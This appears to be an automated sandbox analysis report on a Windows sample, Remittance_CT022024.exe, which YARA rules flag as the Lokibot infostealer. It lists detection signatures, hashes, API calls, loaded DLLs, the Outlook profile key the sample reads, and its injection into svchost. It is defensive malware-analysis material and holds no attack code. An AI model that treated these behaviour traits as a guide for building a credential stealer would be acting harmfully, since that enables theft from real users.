            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 0.2.Remittance_CT022024.exe.d40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 0.2.Remittance_CT022024.exe.d40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 0.2.Remittance_CT022024.exe.d40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 0.2.Remittance_CT022024.exe.d40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.Remittance_CT022024.exe.d40000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 00000000.00000002.2070986946.0000000000D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000000.00000002.2070986946.0000000000D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000000.00000002.2070986946.0000000000D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 00000000.00000002.2070986946.0000000000D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.2070986946.0000000000D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 00000002.00000002.3286162989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000002.00000002.3286162989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000002.00000002.3286162989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 00000002.00000002.3286162989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.3286162989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: Process Memory Space: Remittance_CT022024.exe PID: 5780, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: Process Memory Space: svchost.exe PID: 1440, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/6@1/1
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0079A06A GetLastError,FormatMessageW,0_2_0079A06A
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007881CB AdjustTokenPrivileges,CloseHandle,0_2_007881CB
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007887E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_007887E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,2_2_0040650A
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0079B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0079B333
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007AEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_007AEE0D
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007A83BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_007A83BB
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_00734E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00734E89
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B13360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,2_2_00B13360
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B13360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,2_2_00B13360
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeFile created: C:\Users\user\AppData\Local\Temp\aut115E.tmpJump to behavior
            Source: Remittance_CT022024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: svchost.exe, 00000002.00000003.2056342188.0000000005215000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Remittance_CT022024.exeReversingLabs: Detection: 31%
            Source: Remittance_CT022024.exeVirustotal: Detection: 30%
            Source: unknownProcess created: C:\Users\user\Desktop\Remittance_CT022024.exe "C:\Users\user\Desktop\Remittance_CT022024.exe"
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Remittance_CT022024.exe"
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Remittance_CT022024.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: samlib.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
            Source: Remittance_CT022024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Remittance_CT022024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Remittance_CT022024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Remittance_CT022024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Remittance_CT022024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Remittance_CT022024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Remittance_CT022024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: wntdll.pdbUGP source: Remittance_CT022024.exe, 00000000.00000003.2058088038.0000000003840000.00000004.00001000.00020000.00000000.sdmp, Remittance_CT022024.exe, 00000000.00000003.2055835797.00000000036A0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Remittance_CT022024.exe, 00000000.00000003.2058088038.0000000003840000.00000004.00001000.00020000.00000000.sdmp, Remittance_CT022024.exe, 00000000.00000003.2055835797.00000000036A0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: svchost.exe, svchost.exe, 00000002.00000002.3286250258.0000000000B11000.00000020.00000001.01000000.00000005.sdmp
            Source: Binary string: svchost.pdbUGP source: svchost.exe, 00000002.00000002.3286250258.0000000000B11000.00000020.00000001.01000000.00000005.sdmp
            Source: Remittance_CT022024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Remittance_CT022024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Remittance_CT022024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Remittance_CT022024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Remittance_CT022024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 0.2.Remittance_CT022024.exe.d40000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Remittance_CT022024.exe.d40000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.2070986946.0000000000D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3286162989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Remittance_CT022024.exe PID: 5780, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1440, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_00734B37 LoadLibraryA,GetProcAddress,0_2_00734B37
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0073C4C7 push A30073BAh; retn 0073h0_2_0073C50D
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_00758945 push ecx; ret 0_2_00758958
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402AC0 push eax; ret 2_2_00402AD4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402AC0 push eax; ret 2_2_00402AFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B13360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,2_2_00B13360
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007348D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_007348D7
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007B5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_007B5376
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_00753187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00753187
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
